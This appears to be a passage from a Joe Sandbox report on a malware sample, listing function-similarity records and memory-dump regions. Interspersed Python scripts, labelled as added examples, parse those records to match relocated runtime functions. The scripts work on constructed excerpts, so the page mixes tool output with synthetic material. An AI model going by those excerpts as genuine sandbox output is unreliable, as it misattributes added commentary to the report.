                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F2061
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F206D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F2078
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F2083
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F208E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F2099
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F20A4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F20AF
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F20BA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F20C8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                    • Instruction ID: fef946d97ea5793219a416530691ae89fb4231b3207a572331b6c2269a2de75d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE117476600149AFDB91EF56C841CD93FA6EF44750B5140AABA098F221DB71EE609F90
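The two _free records above share one Opcode ID (dff188c5...) but come from different dumps: the PE-backed image at 00400000 and the 024C0000 region that Joe Sandbox could not map to a PE ("based on PE: false"), and their Instruction IDs differ. That is the cross-dump match an analyst wants pulled out automatically when triaging an unpacked region, since it ties code in the unmapped region back to a known function in the original image. The following Python is an added example, not part of the Joe Sandbox report or its tooling; it assumes only the record layout visible on this page (a record starts at the "APIs" label, and the Source File line carries "Offset" and "based on PE") and runs over a constructed excerpt that copies three of the records above with their call-site lists shortened.

```python
"""Find functions whose Opcode ID recurs across different Joe Sandbox memory
dumps, and pair each PE-backed record with its copy in a non-PE dump."""
import re
from collections import defaultdict

# Constructed sample: three records copied in the shape shown on the report
# page (the two _free wrappers and the __cftoe function), trimmed to the
# fields this parser reads.
SAMPLE = """\
APIs
• _free.LIBCMT ref: 00431DFA
  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000), ref: 00433480
• _free.LIBCMT ref: 00431E06
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
• Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
APIs
• _free.LIBCMT ref: 024F2061
• _free.LIBCMT ref: 024F206D
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
• Instruction ID: fef946d97ea5793219a416530691ae89fb4231b3207a572331b6c2269a2de75d
APIs
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: __cftoe
• Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
• Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
"""

# A top-level call site: "• <api>.<lib>(<args>), ref: <8 hex digits>"
REF = re.compile(r"^• (?P<api>[^\s(]+).*\bref: (?P<addr>[0-9A-Fa-f]{8})$")
# Bullet fields we keep from the record
FIELD = re.compile(r"^• (?P<key>Source File|Opcode ID|Instruction ID|API ID): (?P<val>.*)$")
# Dump base and PE mapping, as printed on the Source File line
SOURCE = re.compile(r"Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")


def parse_records(text):
    """Split report text into one dict per function record (a record starts at 'APIs')."""
    records, cur = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "APIs":
            cur = {"apis": [], "yara": False}
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        if line == "Yara matches":          # label only; the match list is collapsed on the page
            cur["yara"] = True
            continue
        m = FIELD.match(line)
        if m:
            key, val = m.group("key"), m.group("val")
            if key == "Source File":
                s = SOURCE.search(val)
                cur["offset"] = int(s.group("off"), 16)
                cur["based_on_pe"] = s.group("pe") == "true"
            else:
                cur[key.lower().replace(" ", "_")] = val
            continue
        if line.startswith("• Part of subcall"):
            continue                        # a callee's call site, not this function's
        m = REF.match(line)
        if m:
            cur["apis"].append((m.group("api"), int(m.group("addr"), 16)))
    return records


def cross_dump_functions(records):
    """Opcode IDs that occur in more than one dump (more than one Offset)."""
    by_opcode = defaultdict(list)
    for r in records:
        if "opcode_id" in r and "offset" in r:
            by_opcode[r["opcode_id"]].append(r)
    return {op: rs for op, rs in by_opcode.items()
            if len({r["offset"] for r in rs}) > 1}


def relocated_copies(records):
    """Pair each PE-backed record with copies of the same function in a dump that
    is not mapped to a PE. Returns (opcode_id, image_base, copy_base, rva_in_image,
    rva_in_copy); the RVAs are the first call site minus the dump base."""
    out = []
    for op, rs in cross_dump_functions(records).items():
        image = [r for r in rs if r["based_on_pe"] and r["apis"]]
        copies = [r for r in rs if not r["based_on_pe"] and r["apis"]]
        for i in image:
            for c in copies:
                out.append((op, i["offset"], c["offset"],
                            i["apis"][0][1] - i["offset"],
                            c["apis"][0][1] - c["offset"]))
    return out


if __name__ == "__main__":
    for op, ib, cb, ri, rc in relocated_copies(parse_records(SAMPLE)):
        print(f"{op[:16]}... image {ib:08X}+{ri:05X} -> copy {cb:08X}+{rc:05X}")
```

On the excerpt the only cross-dump hit is the _free wrapper: first call site 00431DFA in the image (RVA 31DFA from base 00400000) and 024F2061 in the copy (RVA 32061 from base 024C0000). The RVAs are close but not equal, which is consistent with the differing Instruction IDs: the copy is the same opcode sequence laid out at a different place rather than a byte-identical remap of the image, so match on Opcode ID, not Instruction ID, when hunting relocated code.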

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: __cftoe
• String ID: F(@$F(@
• API String ID: 4189289331-2038261262
• Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
• Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
• Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
• Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                                                    • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                                                    • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                                    • Instruction ID: 53fe295e8d7c1c913dc3419ef71c61c93b0402730f2f3e856031721ee509452d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CC1E270E04389AFDF52DFA9C840BAEBFB1AF89315F04419AE615AB391C7709941CF61
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: fB$csm
                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1586063737
                                                                                                                                                                                                                                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                    • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                                                                                                                                                                                                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                                                                                                                                                                                                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                                                                                                                                                                                                                                    • PMDtoOffset.LIBCMT ref: 00428D4F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                                                    • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                                                    • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                                                    • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 024DC6DC
                                                                                                                                                                                                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 024DC700
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 024DC711
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 024DC71F
                                                                                                                                                                                                                                                                      • Part of subcall function 024C1370: __Mtx_unlock.LIBCPMT ref: 024C1377
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 024DC72F
                                                                                                                                                                                                                                                                      • Part of subcall function 024DC3EF: __Cnd_broadcast.LIBCPMT ref: 024DC3F6
                                                                                                                                                                                                                                                                    • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024DC73D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                                                                    • String ID: t#D
                                                                                                                                                                                                                                                                    • API String ID: 4258476935-1671555958
                                                                                                                                                                                                                                                                    • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                    • Instruction ID: 3d759f5225e069a456697f62c3be3bbee96de026bff47f4d4e7fd28e880ef105
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8101F775900605A7DB11BB65CDD5B9EB35ABF00314F24011BE81997780DBB8EA15CFD2
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 004321C6
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
• __alloca_probe_16.LIBCMT ref: 004322AB
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
• __freea.LIBCMT ref: 0043231B
  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
• __freea.LIBCMT ref: 00432324
• __freea.LIBCMT ref: 00432349
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 3864826663-0
• Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
• Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
• Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
• Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

APIs
  • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
  • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
• _free.LIBCMT ref: 024F1444
• _free.LIBCMT ref: 024F145D
• _free.LIBCMT ref: 024F148F
• _free.LIBCMT ref: 024F1498
• _free.LIBCMT ref: 024F14A4
Strings
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast
• String ID: C
• API String ID: 3291180501-1037565863
• Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
• Instruction ID: 6a463bac80b8cea68074eaabba28607f2c70697511ba6ab4a69f72bd26ec6326
• Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
• Instruction Fuzzy Hash: 29B12775A0121ADBDB64DF18C984BAEB7B5FB88314F1045AEDA0DA7350D770AE90CF40

APIs
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
• Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
• Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
• Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

APIs
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
• Instruction ID: b5a4c6b52f6f898d8f653f2790c7ca7625b2d9d3b143d184c2ffadd173a26ac3
• Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
• Instruction Fuzzy Hash: A061F271A00215AFDBA0CF69C841B9ABBF5EF84710F2541ABEA58EB341D771A941CB50

APIs
• GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
• __fassign.LIBCMT ref: 00433940
• __fassign.LIBCMT ref: 0043395B
• WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
• WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
• WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
• Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
• Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
• Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

APIs
• GetConsoleCP.KERNEL32(?,024EC4A4,E0830C40,?,?,?,?,?,?,024F425F,024CE03C,024EC4A4,?,024EC4A4,024EC4A4,024CE03C), ref: 024F3B2C
• __fassign.LIBCMT ref: 024F3BA7
• __fassign.LIBCMT ref: 024F3BC2
• WideCharToMultiByte.KERNEL32(?,00000000,024EC4A4,00000001,?,00000005,00000000,00000000), ref: 024F3BE8
• WriteFile.KERNEL32(?,?,00000000,024F425F,00000000,?,?,?,?,?,?,?,?,?,024F425F,024CE03C), ref: 024F3C07
• WriteFile.KERNEL32(?,024CE03C,00000001,024F425F,00000000,?,?,?,?,?,?,?,?,?,024F425F,024CE03C), ref: 024F3C40
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
• Instruction ID: 8770ec38e9b0aeb753cb32315334256fefbe27451603a83cc668d9e1a599ff44
• Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
• Instruction Fuzzy Hash: 6D51C575900289AFDB10CFA8D884AEEBBF4EF49704F14419FE655E7291D7309A81CB64
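The records above list the same CRT routines twice: once in the image mapped at 00400000 (based on PE: true) and once in the region at 024C0000 (based on PE: false, with Yara matches), with identical API String IDs (1324828854-0 and 269201875-0). The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses records in this listing's format, pairs the two copies of a function by the API String ID shown under Similarity, and checks whether corresponding `ref:` addresses differ by one constant, which is what a straight relocated copy of the original code looks like. `SAMPLE` is a constructed excerpt: five records copied from this page and trimmed to the fields the script reads; the bullet and header layout is assumed to be exactly as rendered here.

```python
"""Pair Joe Sandbox per-function records across memory regions (added example)."""
import re
from collections import defaultdict

# Constructed excerpt: five records from this report, trimmed to the fields read below.
SAMPLE = """\
APIs
  • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC), ref: 024F2145
• _free.LIBCMT ref: 024F1444
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
Similarity
• API ID: _free$ErrorLast
• String ID: C
• API String ID: 3291180501-1037565863
APIs
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• GetConsoleCP.KERNEL32(?,0042C23D,E0830C40), ref: 004338C5
• __fassign.LIBCMT ref: 00433940
• WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000), ref: 004339A0
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
• GetConsoleCP.KERNEL32(?,024EC4A4,E0830C40), ref: 024F3B2C
• __fassign.LIBCMT ref: 024F3BA7
• WriteFile.KERNEL32(?,?,00000000,024F425F,00000000), ref: 024F3C07
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
"""

RECORD_SPLIT = re.compile(r"^APIs$", re.M)                      # one record per "APIs" header
API_LINE = re.compile(r"^•\s+(?:Part of subcall function [0-9A-F]+:\s+)?([\w:@]+)\..*\bref: ([0-9A-F]{8})$")
SOURCE_LINE = re.compile(r"Offset: ([0-9A-F]+), based on PE: (true|false)")
FIELD_LINE = re.compile(r"^•\s+(API String ID|API ID|String ID): ?(.*)$")


def parse_records(text):
    """Return one dict per record: called APIs with ref addresses, dump region base,
    PE-backed flag, Yara flag and the Similarity identifiers."""
    records = []
    for chunk in RECORD_SPLIT.split(text)[1:]:      # text before the first header is not a record
        rec = {"apis": [], "region_base": None, "pe_backed": None, "yara": False,
               "api_id": None, "string_id": None, "api_string_id": None}
        for raw in chunk.splitlines():
            line = raw.strip()
            if (m := API_LINE.match(line)):
                rec["apis"].append((m.group(1), int(m.group(2), 16)))
            elif (m := SOURCE_LINE.search(line)):
                rec["region_base"] = int(m.group(1), 16)
                rec["pe_backed"] = m.group(2) == "true"
            elif line == "Yara matches":
                rec["yara"] = True
            elif (m := FIELD_LINE.match(line)):
                rec[m.group(1).lower().replace(" ", "_")] = m.group(2).strip() or None
        records.append(rec)
    return records


def pair_regions(records):
    """Group by API String ID; keep IDs seen in both a PE-backed and a non-PE-backed region.
    uniform_delta is the single constant offset between matching ref addresses, or None
    when the deltas differ or the record lists no API calls."""
    groups = defaultdict(lambda: {"pe": [], "non_pe": []})
    for rec in records:
        if rec["api_string_id"] and rec["region_base"] is not None:
            groups[rec["api_string_id"]]["pe" if rec["pe_backed"] else "non_pe"].append(rec)
    pairs = {}
    for sid, g in groups.items():
        if g["pe"] and g["non_pe"]:
            pe, other = g["pe"][0], g["non_pe"][0]
            deltas = {b - a for (na, a), (nb, b) in zip(pe["apis"], other["apis"]) if na == nb}
            pairs[sid] = {"api_id": pe["api_id"], "pe_base": pe["region_base"],
                          "non_pe_base": other["region_base"], "yara_in_non_pe": other["yara"],
                          "uniform_delta": deltas.pop() if len(deltas) == 1 else None}
    return pairs


def non_pe_only(records):
    """API String IDs present only in non-PE-backed regions (code absent from the on-disk image)."""
    pe_ids = {r["api_string_id"] for r in records if r["pe_backed"]}
    return sorted({r["api_string_id"] for r in records
                   if r["pe_backed"] is False and r["api_string_id"] not in pe_ids})


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for sid, info in pair_regions(recs).items():
        delta = "n/a" if info["uniform_delta"] is None else f"{info['uniform_delta']:08X}"
        print(f"{sid} {info['api_id']}: {info['pe_base']:08X} (PE) -> {info['non_pe_base']:08X} "
              f"(non-PE, yara={info['yara_in_non_pe']}), delta {delta}")
    print("non-PE only:", non_pe_only(recs))
```

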